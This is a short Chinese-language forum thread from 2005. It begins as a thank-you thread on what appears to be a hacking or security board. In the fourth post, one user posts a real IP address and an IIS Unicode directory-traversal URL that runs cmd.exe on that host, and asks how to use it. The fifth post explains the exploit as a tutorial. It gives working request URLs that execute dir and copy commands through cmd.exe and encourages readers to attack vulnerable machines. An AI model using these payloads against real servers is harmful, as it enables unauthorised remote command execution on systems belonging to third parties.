返回列表 发帖
tendygreen 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
tendygreen发表于 2005-12-2 11:07 | 只看该作者

[建议]谢谢大家

  这么多天来在这里学到了不少东西。非常感谢各位的无私奉献。我们会继续努力学的。谢谢大家了!
收藏 分享

亮剑 该用户已被删除
沙发
亮剑发表于 2005-12-2 11:21 | 只看该作者

[建议]谢谢大家

是呀!
在这里学到了不少网络安全的知识。真的感谢大家!
顶顶!

TOP

主题
积分
贝壳
0 个 
来自
普陀区 
注册时间
2006-11-23 
最后登录
2006-11-23 
板凳
天空飞人发表于 2005-12-2 14:37 | 只看该作者

[建议]谢谢大家

坚持就是胜利

TOP

icewolf 该用户已被删除
地板
icewolf发表于 2005-12-13 18:58 | 只看该作者

[建议]谢谢大家

主机:61.180.62.144
  可执行Url:
      发现:http://61.180.62.144/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这个应该如何用啊??

TOP

主题
积分
贝壳
0 个 
来自
普陀区 
注册时间
2006-11-23 
最后登录
2006-11-23 
5
天空飞人发表于 2005-12-13 23:38 | 只看该作者

[建议]谢谢大家

由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
如果成功,那么在浏览区可看到如下信息:
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
是不是有自己机器的感觉了,正点!就是这种感觉!
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
http://11.11.22.22/msadc/..%c1%1c../..%c1%1c.. ... ystem32/cmd.exe?/c+dir (这个命令同样道理)
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
会dos的朋友一定懂其意义了,不懂的请去看书 .
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

TOP

x86 该用户已被删除
6
x86发表于 2005-12-14 22:07 | 只看该作者

[建议]谢谢大家

跳转大法?

TOP

返回列表 回复 发帖